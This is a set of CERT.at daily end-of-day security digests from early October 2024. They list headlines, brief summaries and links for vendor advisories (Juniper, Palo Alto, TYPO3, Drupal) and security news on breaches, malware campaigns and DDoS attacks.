https://fortiguard.fortinet.com/outbreak-alert/zimbra-collaboration-rce
∗∗∗ Gutenberg - Moderately critical - Cross Site Request Forgery - SA-CONTRIB-2024-048 ∗∗∗
---------------------------------------------
https://www.drupal.org/sa-contrib-2024-048
∗∗∗ 2024-10-10: Cyber Security Advisory - ABB IRC5 RobotWare – PROFINET Stack Vulnerability ∗∗∗
---------------------------------------------
https://search.abb.com/library/Download.aspx?DocumentID=SI20337&LanguageCod…
∗∗∗ 2024-10 Security Bulletin: Junos OS and Junos OS Evolved: BGP update message containing aggregator attribute with an ASN value of zero (0) is accepted (CVE-2024-47507) ∗∗∗
---------------------------------------------
https://supportportal.juniper.net/s/article/2024-10-Security-Bulletin-Junos…
∗∗∗ 2024-10 Security Bulletin: Junos OS: SRX Series: A large amount of traffic being processed by ATP Cloud can lead to a PFE crash (CVE-2024-47506) ∗∗∗
---------------------------------------------
https://supportportal.juniper.net/s/article/2024-10-Security-Bulletin-Junos…
∗∗∗ 2024-10 Security Bulletin: Junos OS Evolved: Specific low privileged CLI commands and SNMP GET requests can trigger a resource leak ∗∗∗
---------------------------------------------
https://supportportal.juniper.net/s/article/2024-10-Security-Bulletin-Junos…
∗∗∗ 2024-10 Security Bulletin: Junos OS: Multiple vulnerabilities in OSS component nginx resolved ∗∗∗
---------------------------------------------
https://supportportal.juniper.net/s/article/2024-10-Security-Bulletin-Junos…
∗∗∗ 2024-10 Security Bulletin: Junos OS: SRX5000 Series: Receipt of a specific malformed packet will cause a flowd crash (CVE-2024-47504) ∗∗∗
---------------------------------------------
https://supportportal.juniper.net/s/article/2024-10-Security-Bulletin-Junos…
∗∗∗ 2024-10 Security Bulletin: Junos OS: SRX4600 and SRX5000 Series: Sequence of specific PIM packets causes a flowd crash (CVE-2024-47503) ∗∗∗
---------------------------------------------
https://supportportal.juniper.net/s/article/2024-10-Security-Bulletin-Junos…
∗∗∗ 2024-10 Security Bulletin: Junos OS Evolved: TCP session state is not always cleared on the Routing Engine (CVE-2024-47502) ∗∗∗
---------------------------------------------
https://supportportal.juniper.net/s/article/2024-10-Security-Bulletin-Junos…
∗∗∗ 2024-10 Security Bulletin: Junos OS: MX304, MX with MPC10/11/LC9600, and EX9200 with EX9200-15C: In a VPLS or Junos Fusion scenario specific show commands cause an FPC crash (CVE-2024-47501) ∗∗∗
---------------------------------------------
https://supportportal.juniper.net/s/article/2024-10-Security-Bulletin-Junos…
∗∗∗ 2024-10 Security Bulletin: Junos OS and Junos OS Evolved: In a BMP scenario receipt of a malformed AS PATH attribute can cause an RPD core (CVE-2024-47499) ∗∗∗
---------------------------------------------
https://supportportal.juniper.net/s/article/2024-10-Security-Bulletin-Junos…
∗∗∗ 2024-10 Security Bulletin: Junos OS Evolved: QFX5000 Series: Configured MAC learning and move limits are not in effect (CVE-2024-47498) ∗∗∗
---------------------------------------------
https://supportportal.juniper.net/s/article/2024-10-Security-Bulletin-Junos…
∗∗∗ 2024-10 Security Bulletin: Junos OS: SRX Series, QFX Series, MX Series and EX Series: Receiving specific HTTPS traffic causes resource exhaustion (CVE-2024-47497) ∗∗∗
---------------------------------------------
https://supportportal.juniper.net/s/article/2024-10-Security-Bulletin-Junos…
∗∗∗ 2024-10 Security Bulletin: Junos OS: MX Series: The PFE will crash on running a specific command (CVE-2024-47496) ∗∗∗
---------------------------------------------
https://supportportal.juniper.net/s/article/2024-10-Security-Bulletin-Junos…
∗∗∗ 2024-10 Security Bulletin: Junos OS Evolved: In a dual-RE scenario a locally authenticated attacker with shell privileges can take over the device (CVE-2024-47495) ∗∗∗
---------------------------------------------
https://supportportal.juniper.net/s/article/2024-10-Security-Bulletin-Junos…
∗∗∗ 2024-10 Security Bulletin: Junos OS: Due to a race condition AgentD process causes a memory corruption and FPC reset (CVE-2024-47494) ∗∗∗
---------------------------------------------
https://supportportal.juniper.net/s/article/2024-10-Security-Bulletin-Junos…
∗∗∗ 2024-10 Security Bulletin: Junos OS: J-Web: Multiple vulnerabilities resolved in PHP software. ∗∗∗
---------------------------------------------
https://supportportal.juniper.net/s/article/2024-10-Security-Bulletin-Junos…
∗∗∗ 2024-10 Security Bulletin: Junos OS: SRX5K, SRX4600 and MX Series: Trio-based FPCs: Continuous physical interface flaps causes local FPC to crash (CVE-2024-47493) ∗∗∗
---------------------------------------------
https://supportportal.juniper.net/s/article/2024-10-Security-Bulletin-Junos…
∗∗∗ 2024-10 Security Bulletin: Junos OS and Junos OS Evolved: Receipt of a specific malformed BGP path attribute leads to an RPD crash (CVE-2024-47491) ∗∗∗
---------------------------------------------
https://supportportal.juniper.net/s/article/2024-10-Security-Bulletin-Junos…
∗∗∗ 2024-10 Security Bulletin: Junos OS Evolved: ACX 7000 Series: Receipt of specific transit MPLS packets causes resources to be exhausted (CVE-2024-47490) ∗∗∗
---------------------------------------------
https://supportportal.juniper.net/s/article/2024-10-Security-Bulletin-Junos…
∗∗∗ 2024-10 Security Bulletin: Junos OS Evolved: Multiple vulnerabilities resolved in c-ares 1.18.1 ∗∗∗
---------------------------------------------
https://supportportal.juniper.net/s/article/2024-10-Security-Bulletin-Junos…
∗∗∗ 2024-10 Security Bulletin: Junos OS Evolved: ACX Series: Receipt of specific transit protocol packets is incorrectly processed by the RE (CVE-2024-47489) ∗∗∗
---------------------------------------------
https://supportportal.juniper.net/s/article/2024-10-Security-Bulletin-Junos…
∗∗∗ 2024-10 Security Bulletin: Junos Space: Remote Command Execution (RCE) vulnerability in web application (CVE-2024-39563) ∗∗∗
---------------------------------------------
https://supportportal.juniper.net/s/article/2024-10-Security-Bulletin-Junos…
∗∗∗ 2024-10 Security Bulletin: Junos OS and Junos OS Evolved: cRPD: Receipt of crafted TCP traffic can trigger high CPU utilization (CVE-2024-39547) ∗∗∗
---------------------------------------------
https://supportportal.juniper.net/s/article/2024-10-Security-Bulletin-Junos…
∗∗∗ 2024-10 Security Bulletin: Junos OS: Multiple vulnerabilities resolved in OpenSSL ∗∗∗
---------------------------------------------
https://supportportal.juniper.net/s/article/2024-10-Security-Bulletin-Junos…
∗∗∗ 2024-10 Security Bulletin: Junos OS Evolved: Low privileged local user able to view NETCONF traceoptions files (CVE-2024-39544) ∗∗∗
---------------------------------------------
https://supportportal.juniper.net/s/article/2024-10-Security-Bulletin-Junos…
∗∗∗ 2024-10 Security Bulletin: Junos OS Evolved: Connections to the network and broadcast address accepted (CVE-2024-39534) ∗∗∗
---------------------------------------------
https://supportportal.juniper.net/s/article/2024-10-Security-Bulletin-Junos…
∗∗∗ 2024-10 Security Bulletin: Junos OS: SRX Series: Low privileged user able to access sensitive information on file system (CVE-2024-39527) ∗∗∗
---------------------------------------------
https://supportportal.juniper.net/s/article/2024-10-Security-Bulletin-Junos…
∗∗∗ 2024-10 Security Bulletin: Junos OS and Junos OS Evolved: MX Series with MPC10/MPC11/LC9600, MX304, EX9200, PTX Series: Receipt of malformed DHCP packets causes interfaces to stop processing packets (CVE-2024-39526) ∗∗∗
---------------------------------------------
https://supportportal.juniper.net/s/article/2024-10-Security-Bulletin-Junos…
∗∗∗ 2024-10 Security Bulletin: Junos OS and Junos OS Evolved: When BGP nexthop traceoptions is enabled, receipt of specially crafted BGP packet causes RPD crash (CVE-2024-39525) ∗∗∗
---------------------------------------------
https://supportportal.juniper.net/s/article/2024-10-Security-Bulletin-Junos…
∗∗∗ 2024-10 Security Bulletin: Junos OS and Junos OS Evolved: Receipt of a specifically malformed BGP packet causes RPD crash when segment routing is enabled (CVE-2024-39516) ∗∗∗
---------------------------------------------
https://supportportal.juniper.net/s/article/2024-10-Security-Bulletin-Junos…
∗∗∗ 2024-10 Security Bulletin: Junos OS and Junos OS Evolved: With BGP traceoptions enabled, receipt of specially crafted BGP update causes RPD crash (CVE-2024-39515) ∗∗∗
---------------------------------------------
https://supportportal.juniper.net/s/article/2024-10-Security-Bulletin-Junos…
∗∗∗ 2024-10 Security Bulletin: Junos Space: OS command injection vulnerability in OpenSSH (CVE-2023-51385) ∗∗∗
---------------------------------------------
https://supportportal.juniper.net/s/article/2024-10-Security-Bulletin-Junos…
∗∗∗ 2024-10 Security Bulletin: Junos OS and Junos OS Evolved: With BGP traceoptions enabled, receipt of specifically malformed BGP update causes RPD crash (CVE-2024-39516) ∗∗∗
---------------------------------------------
https://supportportal.juniper.net/s/article/2024-10-Security-Bulletin-Junos…
∗∗∗ 2024-10 Security Bulletin: Junos OS and Junos OS Evolved: When BGP traceoptions is enabled, receipt of specially crafted BGP packet causes RPD crash (CVE-2024-39525) ∗∗∗
---------------------------------------------
https://supportportal.juniper.net/s/article/2024-10-Security-Bulletin-Junos…
∗∗∗ SSA-438590 V1.0: Buffer Overflow Vulnerability in Siveillance Video Camera Drivers ∗∗∗
---------------------------------------------
https://cert-portal.siemens.com/productcert/html/ssa-438590.html
∗∗∗ CVE-2024-9469 Cortex XDR Agent: Local Windows User Can Disable the Agent (Severity: MEDIUM) ∗∗∗
---------------------------------------------
https://security.paloaltonetworks.com/CVE-2024-9469
∗∗∗ CVE-2024-9471 PAN-OS: Privilege Escalation (PE) Vulnerability in XML API (Severity: MEDIUM) ∗∗∗
---------------------------------------------
https://security.paloaltonetworks.com/CVE-2024-9471
∗∗∗ CVE-2024-9468 PAN-OS: Firewall Denial of Service (DoS) via a Maliciously Crafted Packet (Severity: HIGH) ∗∗∗
---------------------------------------------
https://security.paloaltonetworks.com/CVE-2024-9468
∗∗∗ PAN-SA-2024-0010 Expedition: Multiple Vulnerabilities Lead to Firewall Admin Account Takeover (Severity: CRITICAL) ∗∗∗
---------------------------------------------
https://security.paloaltonetworks.com/PAN-SA-2024-0010
∗∗∗ CVE-2024-9473 GlobalProtect App: Local Privilege Escalation (PE) Vulnerability (Severity: MEDIUM) ∗∗∗
---------------------------------------------
https://security.paloaltonetworks.com/CVE-2024-9473
∗∗∗ PAN-SA-2024-0011 Chromium: Monthly Vulnerability Updates (Severity: HIGH) ∗∗∗
---------------------------------------------
https://security.paloaltonetworks.com/PAN-SA-2024-0011
∗∗∗ CVE-2024-9470 Cortex XSOAR: Information Disclosure Vulnerability (Severity: MEDIUM) ∗∗∗
---------------------------------------------
https://security.paloaltonetworks.com/CVE-2024-9470
∗∗∗ PAN-SA-2024-0010 Expedition: Multiple Vulnerabilities in Expedition Lead to Exposure of Firewall Credentials (Severity: CRITICAL) ∗∗∗
---------------------------------------------
https://security.paloaltonetworks.com/PAN-SA-2024-0010
--
CERT.at Daily mailing list
Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily
=====================
= End-of-Day report =
=====================
Timeframe: Tuesday 08-10-2024 18:00 − Wednesday 09-10-2024 18:00
Handler: Alexander Riepl
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ Two never-before-seen tools, from same group, infect air-gapped devices ∗∗∗
---------------------------------------------
It's hard enough creating one air-gap-jumping tool. GoldenJackal did it 2x in 5 years.
---------------------------------------------
https://arstechnica.com/security/2024/10/two-never-before-seen-tools-from-s…
∗∗∗ European govt air-gapped systems breached using custom malware ∗∗∗
---------------------------------------------
An APT hacking group known as GoldenJackal has successfully breached air-gapped government systems in Europe using two custom toolsets to steal sensitive data, like emails, encryption keys, images, archives, and documents.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/european-govt-air-gapped-sys…
∗∗∗ New scanner finds Linux, UNIX servers exposed to CUPS RCE attacks ∗∗∗
---------------------------------------------
An automated scanner has been released to help security professionals scan environments for devices vulnerable to the Common Unix Printing System (CUPS) RCE flaw tracked as CVE-2024-47176.
---------------------------------------------
https://www.bleepingcomputer.com/news/software/new-scanner-finds-linux-unix…
∗∗∗ Security vulnerability: Windows RDP servers attackable remotely ∗∗∗
---------------------------------------------
A successful attack does require winning a race condition, but no authentication or user interaction whatsoever.
---------------------------------------------
https://www.golem.de/news/sicherheitsluecke-rdp-server-von-windows-aus-der-…
∗∗∗ Cisco warns: children increase the cyber risk in the home office ∗∗∗
---------------------------------------------
According to Cisco, around two thirds of all parents working from home allow their children access to devices used for work, often even unsupervised.
---------------------------------------------
https://www.golem.de/news/cisco-warnt-kinder-erhoehen-cyberrisiko-im-homeof…
∗∗∗ From Perfctl to InfoStealer ∗∗∗
---------------------------------------------
A few days ago, a new stealthy malware targeting Linux hosts made a lot of noise: perfctl[1]. The malware has been pretty well analyzed and I won't repeat what has been already disclosed. I found a ..
---------------------------------------------
https://isc.sans.edu/diary/From+Perfctl+to+InfoStealer/31334
∗∗∗ Ransomware gang Trinity joins pile of scumbags targeting healthcare ∗∗∗
---------------------------------------------
As if hospitals and clinics didn't have enough to worry about. At least one US healthcare provider has been infected by Trinity, an emerging cybercrime gang with eponymous ransomware that uses double extortion and other "sophisticated" tactics that make it a "significant threat," according to the feds.
---------------------------------------------
https://www.theregister.com/2024/10/09/trinity_ransomware_targets_healthcar…
∗∗∗ Patch Tuesday, October 2024 Edition ∗∗∗
---------------------------------------------
Microsoft today released security updates to fix at least 117 security holes in Windows computers and other software, including two vulnerabilities that are already seeing active attacks. Also, Adobe plugged 52 security holes ..
---------------------------------------------
https://krebsonsecurity.com/2024/10/patch-tuesday-october-2024-edition/
∗∗∗ How to handle vulnerability reports in aviation ∗∗∗
---------------------------------------------
TL;DR Always thank researchers for reporting vulnerabilities. Acknowledging their efforts can set the right tone. Lead all communications with researchers. Don’t let legal or PR teams take over. Provide ..
---------------------------------------------
https://www.pentestpartners.com/security-blog/how-to-handle-vulnerability-r…
∗∗∗ How criminals steal your debit card with fake FinanzOnline notifications ∗∗∗
---------------------------------------------
You are informed by SMS about a refund from the tax office and click on the link. You land on the tax office's website, or at least that is how it looks. You select your bank in order to receive the money. But suddenly an error message from your bank appears. You receive a new debit card and have to cut up the old one and ..
---------------------------------------------
https://www.watchlist-internet.at/news/so-stehlen-kriminelle-kartenwechsel-…
∗∗∗ Contagious Interview: DPRK Threat Actors Lure Tech Industry Job Seekers to Install New Variants of BeaverTail and InvisibleFerret Malware ∗∗∗
---------------------------------------------
Discover how North Korean attackers, posing as recruiters, used an updated downloader and backdoor in a campaign targeting tech job seekers.
---------------------------------------------
https://unit42.paloaltonetworks.com/north-korean-threat-actors-lure-tech-jo…
∗∗∗ Vulnerabilities discovered in Intel's TDX security technology ∗∗∗
---------------------------------------------
Researchers at the University of Lübeck have identified vulnerabilities in Intel's Trusted Domain Extensions. Intel has already closed one of the gaps.
---------------------------------------------
https://heise.de/-9974224
=====================
= Vulnerabilities =
=====================
∗∗∗ Synology-SA-24:12 GitLab ∗∗∗
---------------------------------------------
A vulnerability allows a remote attacker to bypass authentication via a susceptible version of GitLab.
---------------------------------------------
https://www.synology.com/en-global/support/security/Synology_SA_24_12
∗∗∗ DSA-5729-2 apache2 - regression update ∗∗∗
---------------------------------------------
https://lists.debian.org/debian-security-announce/2024/msg00200.html
∗∗∗ Announcement: Drupal core issues with some risk levels may be treated as bugs in the public issue queue, not as private security issues - PSA-2023-07-12 ∗∗∗
---------------------------------------------
https://www.drupal.org/psa-2023-07-12
∗∗∗ Local Privilege Escalation via MSI installer in Palo Alto Networks GlobalProtect ∗∗∗
---------------------------------------------
https://sec-consult.com/de/vulnerability-lab/advisory/local-privilege-escal…
∗∗∗ October Security Update ∗∗∗
---------------------------------------------
https://www.ivanti.com/blog/october-2024-security-update
=====================
= End-of-Day report =
=====================
Timeframe: Monday 07-10-2024 18:00 − Tuesday 08-10-2024 18:00
Handler: Alexander Riepl
Co-Handler: Robert Waldner
=====================
= News =
=====================
∗∗∗ ADT discloses second breach in 2 months, hacked via stolen credentials ∗∗∗
---------------------------------------------
Home and small business security company ADT disclosed it suffered a breach after threat actors gained access to its systems using stolen credentials and exfiltrated employee account data.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/adt-discloses-second-breach-…
∗∗∗ Casio reports IT systems failure after weekend network breach ∗∗∗
---------------------------------------------
Japanese tech giant Casio has suffered a cyberattack after an unauthorized actor accessed its networks on October 5, causing system disruption that impacted some of its services.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/casio-reports-it-systems-fai…
∗∗∗ New Gorilla Botnet Launches Over 300,000 DDoS Attacks Across 100 Countries ∗∗∗
---------------------------------------------
Cybersecurity researchers have discovered a new botnet malware family called Gorilla (aka GorillaBot) that draws its inspiration from the leaked Mirai botnet source code. Cybersecurity firm NSFOCUS, which identified the activity last month, said the botnet "issued over 300,000 attack commands, with a shocking attack density" between September 4 and September 27, 2024.
---------------------------------------------
https://thehackernews.com/2024/10/new-gorilla-botnet-launches-over-300000.h…
∗∗∗ Feds reach for sliver of crypto-cash nicked by North Korea's notorious Lazarus Group ∗∗∗
---------------------------------------------
The US government is attempting to claw back more than $2.67 million stolen by North Korea's Lazarus Group, filing two lawsuits to force the forfeiture of millions in Tether and Bitcoin.…
---------------------------------------------
https://go.theregister.com/feed/www.theregister.com/2024/10/08/us_lazarus_g…
∗∗∗ Shining Light on the Dark Angels Ransomware Group ∗∗∗
---------------------------------------------
The Dark Angels ransomware threat group launched attacks beginning in April 2022, and has since been quietly executing highly targeted attacks. Dark Angels operate with more stealthy and sophisticated strategies than many other ransomware groups. Instead of outsourcing breaches to third-party initial access brokers that target a wide range of victims, Dark Angels launch their own attacks that focus on a limited number of large companies.
---------------------------------------------
https://www.zscaler.com/blogs/security-research/shining-light-dark-angels-r…
∗∗∗ 7,000 WordPress Sites Affected by Unauthenticated Critical Vulnerabilities in LatePoint WordPress Plugin ∗∗∗
---------------------------------------------
On September 17, 2024, our Wordfence Threat Intelligence team identified and began the responsible disclosure process for two critical vulnerabilities in the LatePoint plugin, which is estimated to be actively installed on more than 7,000 WordPress websites.
---------------------------------------------
https://www.wordfence.com/blog/2024/10/7000-wordpress-sites-affected-by-una…
∗∗∗ Nitrogen Campaign Drops Sliver and Ends With BlackCat Ransomware ∗∗∗
---------------------------------------------
In November 2023, we identified a BlackCat ransomware intrusion started by Nitrogen malware hosted on a website impersonating Advanced IP Scanner.
Nitrogen was leveraged to deploy Sliver and Cobalt Strike beacons on the beachhead host and perform further malicious actions.
---------------------------------------------
https://thedfirreport.com/2024/09/30/nitrogen-campaign-drops-sliver-and-end…
∗∗∗ Ukrainian pleads guilty to running Raccoon Infostealer malware, agrees to pay nearly $1 million ∗∗∗
---------------------------------------------
A Ukrainian national pleaded guilty in U.S. federal court to running the Raccoon Infostealer malware, and agreed to pay victims more than $900,000 as part of the plea deal.
---------------------------------------------
https://therecord.media/raccoon-stealer-operator-pleads-guilty
∗∗∗ TAG Bulletin: Q3 2024 ∗∗∗
---------------------------------------------
This bulletin includes coordinated influence operation campaigns terminated on our platforms in Q3 2024. It was last updated on October 7, 2024.
---------------------------------------------
https://blog.google/threat-analysis-group/tag-bulletin-q3-2024/
∗∗∗ Crypto-Stealing Code Lurking in Python Package Dependencies ∗∗∗
---------------------------------------------
On September 22nd, a new PyPI user orchestrated a wide-ranging attack by uploading multiple packages within a short timeframe. These packages, bearing names like “AtomicDecoderss,” “TrustDecoderss,” “WalletDecoderss,” and “ExodusDecodes,” masqueraded as legitimate tools for decoding and managing data from an array of popular cryptocurrency wallets.
---------------------------------------------
https://checkmarx.com/blog/crypto-stealing-code-lurking-in-python-package-d…
∗∗∗ Okta Fixes Critical Vulnerability Allowing Sign-On Policy Bypass ∗∗∗
---------------------------------------------
Okta fixed a vulnerability in its Classic product that allowed attackers to bypass sign-on policies. Exploitation required valid credentials and the use of an “unknown” device. Affected users should review system logs.
---------------------------------------------
https://hackread.com/okta-fixes-sign-on-policy-bypass-vulnerability/
∗∗∗ Cyberattack on American Water Shuts Down Customer Portal, Halts Billing ∗∗∗
---------------------------------------------
American Water faces a cyberattack, disrupting its customer portal and billing operations. The company assures that water services remain unaffected while cybersecurity experts manage the incident.
---------------------------------------------
https://hackread.com/american-water-cyberattack-shuts-down-portal-billing/
∗∗∗ Storm-1575 Threat Actor Deploys New Login Panels for Phishing Infrastructure ∗∗∗
---------------------------------------------
The Storm-1575 group is known for frequently rebranding its phishing infrastructure. Recently, ANY.RUN analysts identified the deployment of new login panels, which are part of the threat actor’s ongoing efforts to compromise users’ Microsoft and Google accounts.
---------------------------------------------
https://hackread.com/storm-1575-threat-actor-new-login-panels-phishing-infr…
∗∗∗ Lua Malware Targeting Student Gamers via Fake Game Cheats ∗∗∗
---------------------------------------------
Morphisec Threat Labs uncovers sophisticated Lua malware targeting student gamers and educational institutions. Learn how these attacks work and how to stay protected.
---------------------------------------------
https://hackread.com/lua-malware-hit-student-gamers-fake-game-cheats/
=====================
= Vulnerabilities =
=====================
∗∗∗ Qualcomm patches high-severity zero-day exploited in attacks ∗∗∗
---------------------------------------------
Qualcomm has released security patches for a zero-day vulnerability in the Digital Signal Processor (DSP) service that impacts dozens of chipsets.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/qualcomm-patches-high-severi…
∗∗∗ TYPO3-CORE-SA-2024-012: Information Disclosure in TYPO3 Page Tree ∗∗∗
---------------------------------------------
It has been discovered that TYPO3 CMS is susceptible to information disclosure.
---------------------------------------------
https://typo3.org/security/advisory/typo3-core-sa-2024-012
∗∗∗ TYPO3-CORE-SA-2024-011: Denial of Service in TYPO3 Bookmark Toolbar ∗∗∗
---------------------------------------------
It has been discovered that TYPO3 CMS is susceptible to denial of service.
---------------------------------------------
https://typo3.org/security/advisory/typo3-core-sa-2024-011
∗∗∗ Security updates for Tuesday ∗∗∗
---------------------------------------------
Security updates have been issued by Debian (kernel), Fedora (webkitgtk), Mageia (cups), Oracle (e2fsprogs, kernel, and kernel-container), Red Hat (buildah, container-tools:rhel8, containernetworking-plugins, git-lfs, go-toolset:rhel8, golang, grafana-pcp, podman, and skopeo), SUSE (Mesa, mozjs115, podofo, and redis7), and Ubuntu (cups and cups-filters).
---------------------------------------------
https://lwn.net/Articles/993276/
∗∗∗ Critical vulnerabilities in Draytek devices allow system takeover ∗∗∗
---------------------------------------------
Researchers found fourteen new vulnerabilities in the operating system of the Vigor routers; two dozen partly outdated models are affected. Patches are available.
---------------------------------------------
https://heise.de/-9973906
=====================
= End-of-Day report =
=====================
Timeframe: Friday 04-10-2024 18:00 − Monday 07-10-2024 18:00
Handler: Alexander Riepl
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ Russia arrests US-sanctioned Cryptex founder, 95 other linked suspects ∗∗∗
---------------------------------------------
Russian law enforcement detained almost 100 suspects linked to the Cryptex cryptocurrency exchange, the UAPS anonymous payment service, and 33 other online services and platforms used to make illegal payments and sell stolen credentials.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/russia-arrests-us-sanctioned…
∗∗∗ MoneyGram: No evidence ransomware is behind recent cyberattack ∗∗∗
---------------------------------------------
MoneyGram says there is no evidence that ransomware is behind a recent cyberattack that led to a five-day outage in September.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/moneygram-no-evidence-ransom…
∗∗∗ Toy brand: hack of the Lego website aims at crypto fraud ∗∗∗
---------------------------------------------
On 4 October 2024 the official Lego website fell victim to a hack. Unknown actors promoted a cryptocurrency called Lego-Coin.
---------------------------------------------
https://www.golem.de/news/spielzeugmarke-hack-der-lego-webseite-zielt-auf-k…
∗∗∗ After the US ban: Kaspersky removed from the Google Play Store worldwide ∗∗∗
---------------------------------------------
Kaspersky software has not been available in the Play Store for days. The cause is the US ban on the Russian vendor, with global consequences.
---------------------------------------------
https://www.golem.de/news/nach-us-bann-kaspersky-fliegt-weltweit-aus-dem-go…
∗∗∗ Awaken Likho is awake: new techniques of an APT group ∗∗∗
---------------------------------------------
Kaspersky experts have discovered a new version of the APT Awaken Likho RAT Trojan, which uses AutoIt scripts and the MeshCentral system to target Russian organizations.
---------------------------------------------
https://securelist.com/awaken-likho-apt-new-implant-campaign/114101/
∗∗∗ HUMINT and its Role within Cybersecurity ∗∗∗
---------------------------------------------
This blog explores HUMINT's role in cybersecurity, detailing its implementation, benefits, and potential risks.
---------------------------------------------
https://www.sans.org/blog/humint-and-its-role-within-cybersecurity
∗∗∗ Largest Recorded DDoS Attack is 3.8 Tbps ∗∗∗
---------------------------------------------
Cloudflare just blocked the current record DDoS attack: 3.8 terabits per second. (Lots of good information on the attack, and DDoS in general, at the link.)
---------------------------------------------
https://www.schneier.com/blog/archives/2024/10/largest-recorded-ddos-attack…
∗∗∗ Critical Apache Avro SDK Flaw Allows Remote Code Execution in Java Applications ∗∗∗
---------------------------------------------
A critical security flaw has been disclosed in the Apache Avro Java Software Development Kit (SDK) that, if successfully exploited, could allow the execution of arbitrary code on susceptible instances. The flaw, tracked as CVE-2024-47561, ..
---------------------------------------------
https://thehackernews.com/2024/10/critical-apache-avro-sdk-flaw-allows.html
∗∗∗ Chinese hackers steal sensitive data from US courts ∗∗∗
---------------------------------------------
Via internet service providers, the "Salt Typhoon" campaign gains access to sensitive data. US authorities fear further attacks.
---------------------------------------------
https://www.derstandard.at/story/3000000239609/chinesische-hacker-stehlen-s…
∗∗∗ No Way to Hide: Uncovering New Campaigns from Daily Tunneling Detection ∗∗∗
---------------------------------------------
Four DNS tunneling campaigns identified through a new machine learning tool expose intricate tactics when targeting vital sectors like finance, healthcare and more.
---------------------------------------------
https://unit42.paloaltonetworks.com/detecting-dns-tunneling-campaigns/
∗∗∗ From Pwn2Own Automotive: More Autel Maxicharger Vulnerabilities ∗∗∗
---------------------------------------------
This blog post highlights two additional vulnerabilities in the Autel Maxicharger that were exploited at Pwn2Own Automotive 2024. Details of the patches are also included.
---------------------------------------------
https://www.thezdi.com/blog/2024/10/2/from-pwn2own-automotive-more-autel-ma…
∗∗∗ Russian state media company operation disrupted by ‘unprecedented’ cyberattack ∗∗∗
---------------------------------------------
Russian state television and radio broadcasting company VGTRK was hit by a cyberattack on Monday that disrupted its operations, the company confirmed in a statement to local news agencies.
---------------------------------------------
https://therecord.media/russian-state-media-company-disrupted-cyberattack
∗∗∗ Engaging with Boards to improve the management of cyber security risk ∗∗∗
---------------------------------------------
How to communicate more effectively with board members to improve cyber security decision making.
---------------------------------------------
https://www.ncsc.gov.uk/guidance/board-level-cyber-discussions-communicatin…
∗∗∗ Forensic Readiness in Container Environments ∗∗∗
---------------------------------------------
One of the most frustrating issues that Digital Forensics and Incident Response (DFIR) consultants encounter is a lack of forensic data available for analysis. This article aims to mitigate such situations by providing key considerations for improving forensic readiness.
---------------------------------------------
https://www.nccgroup.com/us/research-blog/forensic-readiness-in-container-e…
=====================
= Vulnerabilities =
=====================
∗∗∗ DSA-5785-1 mediawiki - security update ∗∗∗
---------------------------------------------
Dom Walden discovered that the AbuseFilter extension in MediaWiki, a website engine for collaborative work, performed incomplete authorisation checks.
---------------------------------------------
https://lists.debian.org/debian-security-announce/2024/msg00198.html
∗∗∗ Security updates for Monday ∗∗∗
---------------------------------------------
Security updates have been issued by AlmaLinux (go-toolset:rhel8 and linux-firmware), Arch Linux (oath-toolkit), Debian (e2fsprogs, firefox-esr, libgsf, mediawiki, and oath-toolkit), Fedora (aws, chromium, firefox, p7zip, pgadmin4, python-gcsfs, unbound, webkitgtk, znc, znc-clientbuffer, and znc-push), Mageia (ghostscript and rootcerts nss firefox firefox-l10n), ..
---------------------------------------------
https://lwn.net/Articles/993160/
--
CERT.at Daily mailing list
Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily
=====================
= End-of-Day report =
=====================
Timeframe: Thursday 03-10-2024 18:00 − Friday 04-10-2024 18:00
Handler: Michael Schlagenhaufer
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ Cloudflare blocks largest recorded DDoS attack peaking at 3.8Tbps ∗∗∗
---------------------------------------------
During a distributed denial-of-service campaign targeting organizations in the financial services, internet, and telecommunications sectors, volumetric attacks peaked at 3.8 terabits per second, the largest publicly recorded to date. The assault consisted of a "month-long" barrage of more than 100 hyper-volumetric DDoS attacks flood. [..] Many of the attacks aimed at the target’s network infrastructure (network and transport layers L3/4) exceeded two billion packets per second (pps) and three terabits per second (Tbps). [..] The threat actor behind the campaign leveraged multiple types of compromised devices, which included a large number of Asus home routers, Mikrotik systems, DVRs, and web servers.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/cloudflare-blocks-largest-re…
∗∗∗ Over 4,000 Adobe Commerce, Magento shops hacked in CosmicSting attacks ∗∗∗
---------------------------------------------
Approximately 5% of all Adobe Commerce and Magento online stores, or 4,275 in absolute numbers, have been hacked in "CosmicSting" attacks. [..] The CosmicSting vulnerability (CVE-2024-34102) is a critical severity information disclosure flaw; when chained with CVE-2024-2961, a security issue in glibc's iconv function, an attacker can achieve remote code execution on the target server. [..] Sansec says that multiple threat actors are now conducting attacks as patching speed is not matching the critical nature of the situation.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/over-4-000-adobe-commerce-ma…
∗∗∗ Survey of CUPS exploit attempts, (Fri, Oct 4th) ∗∗∗
---------------------------------------------
It is about a week since the release of the four CUPS remote code execution vulnerabilities. After the vulnerabilities became known, I configured one of our honeypots that watches a larger set of IPs to specifically collect UDP packets to port 631. Here is a quick summary of the results.
---------------------------------------------
https://isc.sans.edu/diary/rss/31326
∗∗∗ Apple fixes bug that let VoiceOver shout your passwords ∗∗∗
---------------------------------------------
Apple just fixed a duo of security bugs in iOS 18.0.1 and iPadOS 18.0.1, one of which might cause users' saved passwords to be read aloud. It's hardly an ideal situation for the visually impaired. For those who rely on the accessibility features baked into their iGadgets, namely Apple's VoiceOver screen reader, now is a good time to apply the latest update.
---------------------------------------------
https://go.theregister.com/feed/www.theregister.com/2024/10/04/apple_voiceo…
∗∗∗ Security updates: Cisco patches vulnerabilities across its product range ∗∗∗
---------------------------------------------
Besides one critical bug, the network equipment vendor also addresses several vulnerabilities of medium and high risk. Patches are available.
---------------------------------------------
https://heise.de/-9961998
∗∗∗ DRAY:BREAK Breaking Into DrayTek Routers Before Threat Actors Do It Again ∗∗∗
---------------------------------------------
